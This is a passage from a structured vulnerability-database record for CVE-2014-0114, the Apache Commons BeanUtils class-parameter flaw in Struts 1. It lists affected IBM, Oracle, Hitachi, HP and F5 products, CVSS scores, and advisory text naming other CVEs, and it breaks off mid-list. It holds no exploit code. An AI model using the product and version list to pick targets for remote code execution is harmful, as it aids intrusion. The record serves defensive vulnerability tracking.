"tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-03(x64))", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "20500", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "records manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0.1", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-03", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1", }, { model: "tuning manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.2", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-00(x64))", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-01", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.2.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1.2", }, { model: "websphere enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.2", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-10.1", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.3", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1.1", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1.2", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "0", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "omnifind enterprise edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.10", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "57100", }, { model: "big-ip webaccelerator hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.114", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4.1", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1.1", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.3", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "openpages grc platform", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2.1", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-10-03", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.2", }, { model: "security identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "sitescope monitors", scope: "eq", trust: 0.3, vendor: "hp", version: "11.20", }, { model: "secure analytics", scope: "eq", trust: 0.3, vendor: "juniper", version: "2012.1", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "linux s/390", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.52", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-02", }, { model: "content manager records enabler", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "retail invoice matching 12.0in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.4", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "infosphere master data management server for product information", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-02(x64))", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.6", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "rational insight ifix1", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.1", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "jboss fuse", scope: "eq", trust: 0.3, vendor: "redhat", version: "6.1.0", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "websphere partner gateway enterprise edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.2", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.53", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.34", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.1", }, { model: "global link manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.4", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "linux arm", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.4", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "centos", scope: "eq", trust: 0.3, vendor: "centos", version: "5", }, { model: "websphere enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "7", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.001", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.2143", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.12", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.402", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-50", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.1-06", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0", }, { model: "tiered storage manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "real-time decision server", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.37", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "big-ip webaccelerator hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.1", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.21", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "leads", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.6", }, { model: "sitescope", scope: "ne", trust: 0.3, vendor: "hp", version: "11.24.271", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.1", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0-00", }, { model: "tiered storage manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.1", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "tivoli provisioning manager for software", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "global link manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.6", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "56002", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.2", }, { model: "infosphere identity insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "76000", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.1", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "security threat response manager 2012.1r7", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.4", }, { model: "global link manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-01", }, { model: "security threat response manager", scope: "eq", trust: 0.3, vendor: "juniper", version: "2013.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "terasoluna server framework for java", scope: "eq", trust: 0.3, vendor: "ntt data", version: "2.01", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.21.0", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2.0-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3.1", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4-00", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "5.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.00", }, { model: "sitescope", scope: "ne", trust: 0.3, vendor: "hp", version: "11.13", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.2", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.5.0", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.1", }, { model: "enterprise data quality", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.2", }, { model: "predictive insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.20.0", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1.2.0", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.0", }, { model: "insurance ifrs analyzer", scope: "eq", trust: 0.3, vendor: "oracle", version: "178.0.6", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-03", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-50-09", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "10500", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail central office 12.0.9in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "77000", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "global link manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "websphere partner gateway express edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "global link manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-10", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.2.145", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.010", }, { model: "raplication manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.2", }, { model: "raplication manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.13", }, { model: "linux ia-32", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1.1", }, { model: "infosphere mashuphub", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "vcenter server update", scope: "ne", trust: 0.3, vendor: "vmware", version: "5.52", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "tivoli provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.021", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.1", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.1-06", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-00(x64))", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1", }, { model: "enterprise linux desktop workstation client", scope: "eq", trust: 0.3, vendor: "redhat", version: "5", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00", }, { model: "manager", scope: "eq", trust: 0.3, vendor: "suse", version: "111.7", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-01", }, { model: "websphere enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-02", }, { model: "linux powerpc", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "big-ip edge gateway hf7", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1.0", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.3.0-00", }, { model: "tivoli provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.3", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00(x64))", }, { model: "big-ip edge gateway hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "web interface for content management", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.4", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-03", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.20", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-01", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "lotus quickr for websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-02", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.4", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.1", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, ], sources: [ { db: "BID", id: "67121", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Rene Gielen", sources: [ { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 1, }, cve: "CVE-2014-0114", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2014-0114", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [], severity: [ { author: "nvd@nist.gov", id: "CVE-2014-0114", trust: 1, value: "HIGH", }, { author: "CNNVD", id: "CNNVD-201404-581", trust: 0.6, value: "HIGH", }, { author: "VULMON", id: "CVE-2014-0114", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\n* thrift: Improper file path sanitization in\nt_go_generator.cc:format_go_output() of the go client library can allow an\nattacker to inject commands (CVE-2016-5397)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow\nfor arbitrary code execution (CVE-2018-8088)\n\n* jolokia: JMX proxy mode vulnerable to remote code execution\n(CVE-2018-1000130)\n\n* bouncycastle: DSA does not fully validate ASN.1 encoding during signature\nverification allowing for injection of unsigned data (CVE-2016-1000338)\n\n* bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)\n\n* bouncycastle: Information exposure in DSA signature generation via timing\nattack (CVE-2016-1000341)\n\n* bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n(CVE-2016-1000342)\n\n* bouncycastle: DHIES implementation allowed the use of ECB mode\n(CVE-2016-1000344)\n\n* bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle\nattack (CVE-2016-1000345)\n\n* bouncycastle: Other party DH public keys are not fully validated\n(CVE-2016-1000346)\n\n* bouncycastle: ECIES implementation allowed the use of ECB mode\n(CVE-2016-1000352)\n\n* async-http-client: Invalid URL parsing with '?' (CVE-2017-14063)\n\n* undertow: File descriptor leak caused by\nJarURLConnection.getLastModified() allows attacker to cause a denial of\nservice (CVE-2018-1114)\n\n* spring-framework: Directory traversal 